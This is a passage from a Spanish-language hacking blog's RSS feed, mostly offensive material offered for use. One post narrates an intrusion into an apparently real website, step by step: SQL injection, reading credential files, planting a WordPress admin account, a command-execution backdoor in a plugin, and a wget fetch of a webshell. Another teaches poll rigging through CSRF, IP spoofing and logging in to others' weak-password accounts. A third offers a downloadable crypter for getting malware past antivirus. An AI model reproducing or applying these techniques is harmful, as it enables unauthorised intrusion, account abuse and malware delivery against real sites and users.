		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Sacar la redirección de los links de taringa</title>
		<link>http://elrincondeseth.wordpress.com/2011/06/03/sacar-la-redireccion-de-los-links-de-taringa/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/06/03/sacar-la-redireccion-de-los-links-de-taringa/#comments</comments>
		<pubDate>Fri, 03 Jun 2011 05:40:12 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Programas]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=421</guid>
		<description><![CDATA[Desde hace un tiempo taringa redirecciona todos los links salientes a una pagina donde muestra un alert() diciendote que salis de taringa Puede ser que pare el phishing, pero para copypastear las urls en el jdownloader rompia mucho las pelotas, ahi que hice este script para greasemonkey: // ==UserScript== // @name           taringa // @namespace      http://xd-blog.com.ar/ [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=421&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Desde hace un tiempo taringa redirecciona todos los links salientes a una pagina donde muestra un alert() diciendote que salis de taringa</p>
<p>Puede ser que pare el phishing, pero para copypastear las urls en el jdownloader rompia mucho las pelotas, ahi que hice este script para greasemonkey:</p>
<p>// ==UserScript==</p>
<p> // @name           taringa</p>
<p> // @namespace      http://xd-blog.com.ar/</p>
<p> // @description    Saca el out?url de taringa</p>
<p> // @include        http://www.taringa.net/*</p>
<p> // ==/UserScript==</p>
<p>//agregar link para reportar spam</p>
<p> var allElements, thisElement, link;</p>
<p> allElements = document.getElementsByTagName(&#8216;a&#8217;);</p>
<p> for (var i = 0; i &lt; allElements.length; i++) {</p>
<p> thisElement = allElements[i];</p>
<p> if(thisElement.href.search(&#8216;http://links.itaringa.net/out?&#8217;)!=-1){</p>
<p> link = thisElement.href.split(&#8216;http://links.itaringa.net/out?&#8217;)</p>
<p> thisElement.href = link[1];</p>
<p> }</p>
<p> }</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/421/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/421/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/421/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/421/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/421/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/421/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/421/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/421/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=421&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/06/03/sacar-la-redireccion-de-los-links-de-taringa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Relato de un ataque</title>
		<link>http://elrincondeseth.wordpress.com/2011/06/03/relato-de-un-ataque/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/06/03/relato-de-un-ataque/#comments</comments>
		<pubDate>Fri, 03 Jun 2011 00:03:16 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=423</guid>
		<description><![CDATA[Voy a contar como fuimos escalando privilegios en una web. Arrancó con una sqli: http://example.com/products.php?id=boxes Pongo una comilla: http://example.com/products.php?id=boxes&#8217; y da error: mysql_query() Error: &#8216;unclosed quotation mark in /var/www/example/web/products.php&#8217; Inyectamos sin romper la query: http://example.com/products.php?id=boxes&#8217; and 1=1 &#8212; - Anulamos el select original: http://example.com/products.php?id=boxes&#8217; and 1=0 &#8212; - Buscamos la cantidad de columnas: http://example.com/products.php?id=boxes&#8217; and [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=423&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Voy a contar como fuimos escalando privilegios en una web.<br />
Arrancó con una sqli:</p>
<p>http://example.com/products.php?id=boxes</p>
<p>Pongo una comilla:</p>
<p>http://example.com/products.php?id=boxes&#8217;</p>
<p>y da error:</p>
<blockquote><p>
mysql_query() Error: &#8216;unclosed quotation mark in /var/www/example/web/products.php&#8217;</p></blockquote>
<p>Inyectamos sin romper la query:<br />
http://example.com/products.php?id=boxes&#8217; and 1=1 &#8212; -</p>
<p>Anulamos el select original:<br />
http://example.com/products.php?id=boxes&#8217; and 1=0 &#8212; -</p>
<p>Buscamos la cantidad de columnas:<br />
http://example.com/products.php?id=boxes&#8217; and 1=0 union select 1 &#8212; -    ==&gt; Muestra &#8220;1&#8243;<br />
http://example.com/products.php?id=boxes&#8217; and 1=0 union select 1,2 &#8212; -   ==&gt; Error<br />
Tiene una columna</p>
<p>Tratamos de leer el archivo (la ruta sale de los errores de las querys invalidas):<br />
http://example.com/products.php?id=boxes&#8217; and 1=0 union select load_file(&#8216;/var/www/example/web/products.php&#8217;) &#8212; -</p>
<p>Entre otras cosas sale:</p>
<div>
<blockquote>
<pre>&lt;?PHP
include('includes/database.php");</pre>
</blockquote>
</div>
<p>Leo database.php:<br />
http://example.com/products.php?id=boxes&#8217; and 1=0 union select load_file(&#8216;/var/www/example/web/database.php&#8217;) &#8212; -</p>
<p>Entre otras cosas sale:</p>
<div>
<blockquote>
<pre>function connect_db($db_name){
    $server = "localhost";
    $username = "example_example";
    $password = "1254387542266";
    if(@mysql_connect($server, $username, $password)){
        if(@mysql_select_db($db_name)){
            return TRUE;
        }
    }
    return FALSE;
}

function call_external_db($db_name){
    $server = "localhost";
    $username = "ex4mpl3_root";
    $password = "86901283412";
    if(mysql_connect($server, $username, $password) or die(mysql_error())){
        if(@mysql_select_db($db_name)){
            return TRUE;
        }else{
            return FALSE;
        }
    }
    return FALSE;
}</pre>
</blockquote>
</div>
<p>A pesar de que los nombres de las funciones sugieran otra cosa, las dos funciones conectan a localhost y lo que cambia son el usuario y la contraseña.</p>
<p>Vemos si se puede conectar a mysql desde internet:</p>
<div>
<blockquote>
<pre>sudo nmap -sV -p 3306 -PN mistralni.co.uk</pre>
</blockquote>
</div>
<p>Sale algo asi:</p>
<div>
<blockquote>
<pre>3306/tcp open  mysql   MySQL 5.0</pre>
</blockquote>
</div>
<p>Probamos con el primer usuario:</p>
<div>
<blockquote>
<pre>mysql -h example.com -u example_example -p</pre>
</blockquote>
</div>
<p>No anda, asi que es lo mismo con el segundo. Funciona</p>
<p>Desde el cliente de mysql trato de escribir una shell:</p>
<div>
<blockquote>
<pre>select '&lt;?PHP echo system($_GET[1]);' into dumpfile '/var/www/example/web/asd.php';
select '&lt;?PHP echo system($_GET[1]);' into dumpfile '/var/www/example/web/includes/asd.php';
select '&lt;?PHP echo system($_GET[1]);' into dumpfile '/var/www/example/web/js/asd.php';</pre>
</blockquote>
</div>
<p>Probé con varias carpetas que sabia que existian, pero en ninguna tenia permisos de escritura<br />
Seguí bajando archivos con load_file, pero en ninguno encontré vulnerabilidades que no sean sqli.</p>
<p>Miro las bases de datos:</p>
<div>
<blockquote>
<pre>mysql&gt; show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| example            |
| example_admin      |
| example_orders     |
| example_products   |
| example_users      |
| example_wordpress  |
| mysql              |
+--------------------+</pre>
</blockquote>
</div>
<p>Hay un par de claves hasheadas, alguna están en DBs de hashes, pero no las usamos.<br />
Me llama la atención el wordpress que no habia visto al navegar por la pagina, asi que lo busco con google y de paso me fijo si hay algo mas que no haya visto:</p>
<div>
<blockquote>
<pre>site:example.com</pre>
</blockquote>
</div>
<p>El wordpress resultó estar en /articles/</p>
<p>Despues hay que crear un usuario en wordpress, se guardan en wp_users:</p>
<div>
<blockquote>
<pre>select * from wp_users;</pre>
</blockquote>
</div>
<p>Y hay que imitar el formato de lo que sale:</p>
<div>
<blockquote>
<pre>insert into wp_users (id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) values (5, 'caca', md5('caca'), 'caca', 'caca@caca.com', '', '2011-1-1 10:10:10', '', 0, 'caca');</pre>
</blockquote>
</div>
<p>Después hay que darle privilegios de administrador, para eso se escribe en wp_usermeta:</p>
<div>
<blockquote>
<pre>+----------+---------+-----------------+-------------------------------------+
| umeta_id | user_id | meta_key        | meta_value                          |
+----------+---------+-----------------+-------------------------------------+
|       99 |       5 | wp_capabilities | a:1:{s:13:"administrator";s:1:"1";} |
+----------+---------+-----------------+-------------------------------------+</pre>
</blockquote>
</div>
<p>(no pongo la query, pero es similar a la anterior)</p>
<p>Entré con el usuario nuevo a wordpress (/articles/wp-admin/) y fui al editor de plugins. Habia uno con permisos de escritura, asi que le meti una shell al principio:</p>
<div>
<blockquote>
<pre>if ( isset($_GET['cmd']) ) {
    system($_GET['cmd'];
    die();
}</pre>
</blockquote>
</div>
<p>Con eso subí una webshell:</p>
<div>
<blockquote>
<pre>plugin.php?cmd=wget http://emelco.googlecode.com/svn/trunk/emelco-1.4.php</pre>
</blockquote>
</div>
<p>Y listo, lo que yo queria era descargarme toda la web. Se podia tratar de rootear o defacear pero no me interesa</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/423/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/423/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/423/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/423/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/423/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/423/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/423/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/423/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=423&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/06/03/relato-de-un-ataque/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Formas de alterar encuestas</title>
		<link>http://elrincondeseth.wordpress.com/2011/05/31/formas-de-alterar-encuestas/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/05/31/formas-de-alterar-encuestas/#comments</comments>
		<pubDate>Tue, 31 May 2011 17:18:43 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=417</guid>
		<description><![CDATA[http://hackaday.com/2009/04/29/times-poll-hacked/ http://musicmachinery.com/2009/04/15/inside-the-precision-hack/ Esto va a ser medio croto, pero espero que por lo menos les de ideas Si te banea por cookies, simplemente se borran las cookies con firecookie, add and edit cookies, etc https://addons.mozilla.org/es-ES/firefox/addon/add-n-edit-cookies/ https://addons.mozilla.org/es-ES/firefox/addon/firecookie/ Si el ban es por ip: Se puede tratar de spoofear con X-Forwarded-For: http://www.elartedeprogramar.cl/seguridad_web/ip_spoofing_14.0.html https://www.underground.org.mx/index.php?topic=21798.0 Podes usar proxys (tor, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=417&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://hackaday.com/2009/04/29/times-poll-hacked/" target="_blank">http://hackaday.com/2009/04/29/times-poll-hacked/</a><br />
<a href="http://musicmachinery.com/2009/04/15/inside-the-precision-hack/" target="_blank">http://musicmachinery.com/2009/04/15/inside-the-precision-hack/</a></p>
<p>Esto va a ser medio croto, pero espero que por lo menos les de ideas</p>
<p>Si te banea por cookies, simplemente se borran las cookies con firecookie, add and edit cookies, etc<br />
<a href="https://addons.mozilla.org/es-ES/firefox/addon/add-n-edit-cookies/" target="_blank">https://addons.mozilla.org/es-ES/firefox/addon/add-n-edit-cookies/</a><br />
<a href="https://addons.mozilla.org/es-ES/firefox/addon/firecookie/" target="_blank">https://addons.mozilla.org/es-ES/firefox/addon/firecookie/</a></p>
<p>Si el ban es por ip:<br />
Se puede tratar de spoofear con X-Forwarded-For:<br />
<a href="http://www.elartedeprogramar.cl/seguridad_web/ip_spoofing_14.0.html" target="_blank">http://www.elartedeprogramar.cl/seguridad_web/ip_spoofing_14.0.html</a><br />
<a href="https://www.underground.org.mx/index.php?topic=21798.0" target="_blank">https://www.underground.org.mx/index.php?topic=21798.0</a><br />
Podes usar proxys (tor, foxyproxy, etc)<br />
<a href="https://addons.mozilla.org/es-ES/firefox/addon/foxyproxy-standard/" target="_blank">https://addons.mozilla.org/es-ES/firefox/addon/foxyproxy-standard/</a><br />
<a href="https://duckduckgo.com/?q=proxy+list" target="_blank">https://duckduckgo.com/?q=proxy+list</a><br />
<a href="https://www.torproject.org/" target="_blank">https://www.torproject.org/</a><br />
Se puede usar csrf para que voten otros. Por ejemplo, si la url para votar es <a href="http://example.com/vote.php?name=pepe&amp;vote=true" target="_blank">http://example.com/vote.php?name=pepe&amp;vote=true</a>, podes poner en la firma del foro [img]http://example.com/vote.php?name=pepe&amp;vote=true[/img]</p>
<p>A veces se puede elegir un puntaje. Me acuerdo de una votación que te permitia darle a cada participante un voto del 1 al 5 y mostraba las opciones en selects. Cambiando el valor con live http headers por 32000, dabas 32k puntos en una sola petición. También podria ser posible darles votos negativos a los demás</p>
<p>Para hacer muchas peticiones:<br />
php + curl, lo mas dificil pero tambien mas flexible <a href="http://www.php.net/manual/es/book.curl.php" target="_blank">http://www.php.net/manual/es/book.curl.php</a><br />
live http headers, es facil de usar y sirve cuando todas las peticiones son iguales <a href="https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/</a><br />
imacros, es mejor para cuando hay mucho javascript modificando la pagina <a href="https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/</a></p>
<p>Ban por usuario:<br />
A veces tenés que estar registrado para poder votar y cada usuario puede hacerlo una vez sola.<br />
Para crear cuentas rapido, con emails descartables, <a href="http://10minutemail.com/10MinuteMail/index.html" target="_blank">http://10minutemail.com/10MinuteMail/index.html</a> <a href="http://www.guerrillamail.com/" target="_blank">http://www.guerrillamail.com/</a><br />
También podes usar cuentas ya existentes. Por ejemplo, en smf ves la lista de usuarios, te fijas cuales tienen 1234 de clave y votas con esas cuentas</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/417/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/417/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/417/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/417/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/417/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/417/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/417/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/417/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=417&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/05/31/formas-de-alterar-encuestas/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>AnalCrypter (php + bamcompile)</title>
		<link>http://elrincondeseth.wordpress.com/2011/05/18/analcrypter-php-bamcompile/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/05/18/analcrypter-php-bamcompile/#comments</comments>
		<pubDate>Wed, 18 May 2011 03:49:50 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Programas]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=411</guid>
		<description><![CDATA[File Info Report date: 2011-05-17 15:00:25 (GMT 1) File name: spy-net-exe File size: 282624 bytes MD5 Hash: 5baf07a70240fdc4f21 93aa84c759ce7 SHA1 Hash: 04a29746c6447897275 9b2513aa18ca5e3e439 7d Detection rate: 5 on 6 (83%) Status: INFECTED Detections AVG &#8211; PSW.Generic8.ISF Avira AntiVir &#8211; TR/Crypt.CFI.Gen ClamAV &#8211; Trojan.Agent-171451 Emsisoft &#8211; Worm.Win32.Rebhip!IK TrendMicro - Zoner &#8211; Trojan.Agent.171451 Scan report generated by [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=411&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<blockquote><p>File Info</p>
<p>Report date: 2011-05-17 15:00:25 (GMT 1)<br />
File name: spy-net-exe<br />
File size: 282624 bytes<br />
MD5 Hash: 5baf07a70240fdc4f21 93aa84c759ce7<br />
SHA1 Hash: 04a29746c6447897275 9b2513aa18ca5e3e439 7d<br />
Detection rate: 5 on 6 (83%)<br />
Status: INFECTED</p>
<p>Detections</p>
<p>AVG &#8211; PSW.Generic8.ISF<br />
Avira AntiVir &#8211; TR/Crypt.CFI.Gen<br />
ClamAV &#8211; Trojan.Agent-171451<br />
Emsisoft &#8211; Worm.Win32.Rebhip!IK<br />
TrendMicro -<br />
Zoner &#8211; Trojan.Agent.171451</p>
<p>Scan report generated by<br />
NoVirusThanks.org</p></blockquote>
<blockquote><p>
File Info</p>
<p>Report date: 2011-05-17 15:02:09 (GMT 1)<br />
File name: anal-exe<br />
File size: 969216 bytes<br />
MD5 Hash: e5655ffe1d229181fbb fc56aef644b8a<br />
SHA1 Hash: fd5977a51cb8a6d2774 17b09b5ea9bce6b8dbd 27<br />
Detection rate: 1 on 6 (17%)<br />
Status: INFECTED</p>
<p>Detections</p>
<p>AVG -<br />
Avira AntiVir -<br />
ClamAV -<br />
Emsisoft -<br />
TrendMicro -<br />
Zoner &#8211; Trojan.Small-2497</p>
<p>Scan report generated by<br />
NoVirusThanks.org
</p></blockquote>
<p>En novirusthanks, al stub solo lo detecta zoner, pero no puedo hacer nada porque detecta a todos lo que pasas por bamcompile.<br />
Lo probé en windows xp sp3 y anduvo. En xp sp2 creo que no se oculta la ventana negra del cmd. En vista y 7 ni idea que pasa.</p>
<p>el readme:</p>
<blockquote><p>
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;<br />
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Como usarlo&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;<br />
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;<br />
-La primera vez, ejecut� compile.bat<br />
-Pon� tu icono en lugar de icono.ico<br />
-Pon� el malware en lugar de malware.exe<br />
-Ejecut� crypter.exe<br />
-???<br />
-Profit!</p>
<p>&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;<br />
&gt;&gt;&gt;&gt;&gt;&gt;&gt;Como funciona&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;<br />
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;<br />
Tanto el stub como el programa que encripta est�n hechos en php y son pasados a exe con bamcompile<br />
Para entenderlo mejor, explico que es cada archivo:<br />
sauce/ es el directorio con los archivos php<br />
sauce/stub.php es el stub sin modificar<br />
sauce/custom-stub.php es el stub con el malware adentro, listo para convertirlo a exe<br />
sauce/crypter.php encripta el malware, lo mete en el stub y ejecuta bamcompile<br />
compile.bat genera crypter.exe a partir de crypter.php<br />
bamcompile.exe es usado para convertir los php a exe<br />
icono.ico es el icono que se usa en el exe del malware encriptado (por defecto, uno que venia con bamcompile)<br />
malware.exe es el malware sin encriptar (calc.exe para probar)<br />
bamcompile_readme.txt es el readme de bamcompile, puede ser util para indetectar o achicar el resultado<br />
stub.bcp es el archivo que le indica a bamcompile como construir malware-custom.exe<br />
crypter.bcp le indica a bamcompile como construir crypter.exe</p>
<p>El crypter: lee el stub, lee el malware, pasa el malware a base64 (si, no lo encripta en realidad, hay que cambiar esto para que el resultado final sea mas chico), lo mete en lugar de la cadena #REPLACE# en el stub, guarda esto en custom-stub.php y ejecuta bamcompile (con -c para comprimir con upx).<br />
Muestra unas letras que al principio eran para debuguear y las dej� como indicadores de progreso.<br />
Al principio habia hecho el c�digo con file_get_contents() y file_put_contents() pero no servia porque bamcompile usa php 4, asi que copi� las dos funciones de php.net. Hay que cambiar eso por fopen(), fwrite(), fread(), feof() y fclose().</p>
<p>El stub: tiene un lugar reservado : $a=&#8217;#REPLACE#&#8217;; En custom-stub.php, ahi ya va a estar el malware encriptado y el c�digo va a parecer mas l�gico.<br />
$w es &#8216;base64_decode&#8217;.<br />
$b es la ruta del exe a donde se va a escribir el malware desencriptado.<br />
$e es la ruta del bat, ya voy a explicar eso.<br />
$q = $e, osfuscado<br />
Se escribe el malware desemcriptado en $b<br />
Se escribe en el bat: cmdow.exe @ /HID\nX:/ruta/al/archivo.exe<br />
Eso es para poder ocultar la ventana del cmd con cmdow, aunque no creo que funcione en todas las m�quinas, es otra cosa que hay que mejorar. Adem�s, se llega a ver un segundo la ventana.<br />
Finalmente se ejecuta el bat<br />
Tiene el mismo problema con file_put_contents() que crypter.php</p>
<p>Hay mas problemas, como que los .bcp est�n mal hechos y a todos los .exe les mete todos los archivos de sauce<br />
No puedo hacer que no sea detectado por zoner, eso marca como dropper a cualquier cosa generada con bamcompile<br />
No estoy seguro si es $_ENV['TMP'] o $_ENV['TEMP'], en mi m�quina funcionaban las dos<br />
Malware.exe es demasiado grande y agranda el rar al pedo
</p></blockquote>
<p><a href="http://xd-blog.com.ar/descargas/programas/AnalCrypter-1.0.zip" title="Descarga">Descarga</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/411/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/411/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/411/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/411/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/411/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/411/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/411/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/411/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=411&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/05/18/analcrypter-php-bamcompile/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Diccionario con nombres</title>
		<link>http://elrincondeseth.wordpress.com/2011/05/10/diccionario-con-nombres/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/05/10/diccionario-con-nombres/#comments</comments>
		<pubDate>Tue, 10 May 2011 19:28:20 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=408</guid>
		<description><![CDATA[Son los que figuran en la web del gobierno de bs as http://xd-blog.com.ar//descargas/nombres.txt<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=408&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Son los que figuran en la web del gobierno de bs as</p>
<p><a href="http://xd-blog.com.ar//descargas/nombres.txt">http://xd-blog.com.ar//descargas/nombres.txt</a></p>
